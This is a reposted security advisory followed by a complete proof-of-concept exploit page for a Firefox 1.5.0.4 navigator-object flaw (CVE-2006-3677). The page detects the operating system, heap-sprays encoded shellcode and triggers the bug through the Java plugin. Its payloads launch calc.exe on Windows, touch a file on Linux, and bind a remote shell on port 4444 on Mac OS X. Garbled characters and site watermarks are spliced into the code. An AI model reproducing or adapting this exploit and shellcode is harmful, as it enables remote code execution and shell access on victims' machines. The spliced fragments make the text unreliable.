Firefox Javascript navigator Object Code Execution (PoC)

Summary
Firefox has been found to contain a vulnerability that allows remote attackers to cause the product, by supplying it with a malformed HTML file, to execute arbitrary code through the use of the 'navigator' object.
 
Credit:
The information has been provided by Anonymous.£ 
 
 Details
Vulnerable Systems:
 * Firefox version 1.5.04

Immune Systems:
 * Firefox version 1.5.05

Exploit:
<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system.
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is
trivial to turn into a working exploit. The demonstration link below will attempt
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
function Demo() {

// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677

// The Java plugin is required for this to work

// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b %u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb %u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b %u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad %u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b %u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;

Íø¹ÜÏÂÔØdl.bitscn.com

// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962 %u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d %u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

// mac os x ppc = bind a shell to 4444
var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002 %u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88 %u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278 %u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800 %u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002 %u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4 %u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5 %u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68 %u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b %u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63 %u7368%u0000%u0000');

Íø¹ÜÏÂÔØdl.bitscn.com

var fill_macppc = unescape('%u0c0c');
var addr_macppc = 0x0c000000;

// mac os x intel = bind a shell to 4444
// Thanks to nemo[at]felinemenace.org for shellcode
// Thanks to Todd Manning for the target information and testing
var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1 %u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd %u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890 f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
var fill_macx86 = unescape('%u1c1c');
var addr_macx86 = 0x1c000000;


// Start the browser detection
var shellcode;
var addr;
var fill;
var ua = '' + navigator.userAgent;

if (ua.indexOf('Linux') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}

if (ua.indexOf('Windows') != -1) {
alert('Trying to launch Calculator'); Íø¹ÜÍøwww.bitscn.com
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}

if (ua.indexOf('PPC Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macppc;
addr = addr_macppc;
fill = fill_macppc;
}

if (ua.indexOf('Intel Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macx86;
addr = addr_macx86;
fill = fill_macx86;
}

if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
}

var b = fill;
while (b.length <= 0x400000) b+=b;

var c = new Array();
for (var i =0; i<36; i++) {
c =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}

ÖйúÍø¹ÜÂÛ̳bbs.bitsCN.com
if (window.navigator.javaEnabled) {
window.navigator = (addr / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
alert('Patched!');
}catch(e){
alert('No Java plugin installed!');
}
}
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>


# bb-pcsecurity.de - always be up to date£